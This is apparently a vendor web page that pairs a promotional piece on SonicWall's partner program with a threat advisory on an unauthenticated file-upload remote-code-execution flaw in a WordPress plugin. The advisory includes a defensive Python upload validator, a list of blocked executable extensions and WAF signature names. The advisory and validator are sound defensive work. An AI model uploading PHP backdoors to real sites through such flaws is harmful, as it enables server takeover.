CRN’s 50 Most Influential Channel Chiefs of 2017 are drawn from a larger group of Channel honorees that represent the elite members of the IT channel executives – “leaders who drive the channel agenda and evangelize the importance of the channel partnerships.”

2017 Channel Chief

These are exciting times for SonicWall and our Partners. As the newly independent SonicWall we are proudly declaring that we are once again 100% channel, 100% security, 100% of the time. We are so fortunate to have the most tenured, talented and loyal Partners and I know Steve, along with the entire company, feels a deep and abiding obligation to ensure this next generation of SonicWall always puts our Partners first in our strategies and our priorities.

To that end, Steve and our channel team have launched the SonicWall SecureFirst Partner Program worldwide to our thousands of valued SonicWall Partners. SecureFirst is designed to easily give partners access to our entire security portfolio and reward them for the value they bring to selling and supporting SonicWall solutions. We're thrilled that SecureFirst is off to an extremely fast start. In the first 90 days:

  • SecureFirst program registrations reached over 9,000 Partners across 90 countries
  • SecureFirst registrations in North America exceeded 5,900 Partners
  • SecureFirst Deal Registrations have spiked 66% in North America since divestiture

We look forward to continuing to help our partners work with their customers to successfully navigate the expanding landscape of advanced threats in the cyber security arms race. We're actively driving an industry-leading product portfolio to help customers detect and prevent breaches delivered in any vehicle, in any package, across any network and on any device. In fact, our continued innovations around the SonicWall real-time breach prevention platform recently won four awards at RSA 2017, including the SC Magazine Trust Award for Best UTM Security Solution for our SonicWall TZ Firewall Series.

It’s clear that with Steve as our channel chief, backed by the full commitment and resource of SonicWall, we will continue to always put our Partners first, with SecureFirst.

WordPress Mobile App Native Plugin Vulnerability Leads to Web Site PWNage (Mar 03, 2017)

The Mobile App Native Plugin for WordPress lets you turn your website into a mobile application in just a few minutes. Recently, there was a vulnerability discovered that allows attackers to execute remote code.

It turns out that the plugin does not:

  1. Require authentication for file uploads. Any user can upload any file, be it text, image or even executable.
  2. Check whether the uploaded file contains executable code.
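The two missing checks above are the whole fix: an upload endpoint must establish who is uploading and must refuse anything that the web server would execute. The following is an added example, not code from the plugin or from SonicWall (the plugin itself is PHP; this models the same gate in Python): it applies authentication and capability checks, an extension allow-list that also catches double extensions such as `shell.php.jpg`, and a content check for PHP open tags so that an image file carrying code is refused too. The extension sets and the tag list are assumptions chosen for the example.

```python
import os
from typing import Tuple

# Assumed policy for the example: what the endpoint exists to accept ...
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}
# ... and what must never be written under the web root, even as a middle extension
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar",
                         "cgi", "pl", "py", "sh", "exe", "htaccess"}
# Byte sequences that mark the start of PHP code inside an otherwise "harmless" file
PHP_OPEN_TAGS = (b"<?php", b"<?=")


def validate_upload(authenticated: bool, may_upload: bool,
                    filename: str, content: bytes) -> Tuple[bool, str]:
    """Decide whether an upload may be stored; returns (accepted, reason)."""
    # Check 1 the plugin lacked: the request must come from a logged-in user with
    # the upload capability, not from an anonymous visitor.
    if not authenticated:
        return False, "authentication required"
    if not may_upload:
        return False, "account lacks the upload capability"

    # Normalise the name: strip any directory component the client supplied.
    base = os.path.basename(filename.replace("\\", "/"))
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "filename must have a name and an extension"

    # Check 2 the plugin lacked, part one: every extension is inspected, so a
    # double extension like shell.php.jpg is rejected along with backdoor.php.
    extensions = parts[1:]
    if any(ext in EXECUTABLE_EXTENSIONS for ext in extensions):
        return False, "executable extension is not allowed"
    if extensions[-1] not in ALLOWED_EXTENSIONS:
        return False, f"extension .{extensions[-1]} is not on the allow-list"

    # Check 2, part two: the bytes themselves must not contain PHP code.
    if any(tag in content for tag in PHP_OPEN_TAGS):
        return False, "file content contains PHP code"
    return True, "accepted"


if __name__ == "__main__":
    # Constructed requests: an anonymous upload, a clean image, and three hostile names/bodies
    for args in ((False, True, "avatar.png", b"\x89PNG\r\n"),
                 (True, True, "avatar.png", b"\x89PNG\r\n"),
                 (True, True, "backdoor.php", b"<?php echo 1; ?>"),
                 (True, True, "shell.php.jpg", b"GIF89a"),
                 (True, True, "photo.jpg", b"GIF89a<?php echo 1; ?>")):
        print(args[2], "->", validate_upload(*args))
```

Storing accepted files outside the document root, or in a directory where script execution is disabled, is the belt to this braces: the checks above stop the upload, the storage location stops execution if a check is ever bypassed.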

Given the above, any user can simply upload a PHP file that allows for code execution. This is similar to the backdoor.php file shown in How To Own A Web Server By Writing An Email (Jan 4, 2017).

Once backdoor.php has been successfully uploaded, the attacker can then go to it and perform any malicious actions he or she wishes.

The SonicWALL Threat Research Team has researched this vulnerability and has the following signatures in place to protect customers:

  • WAF:9016 – PHP Injection Attack
  • WAF:9039 – PHP Injection Attack 2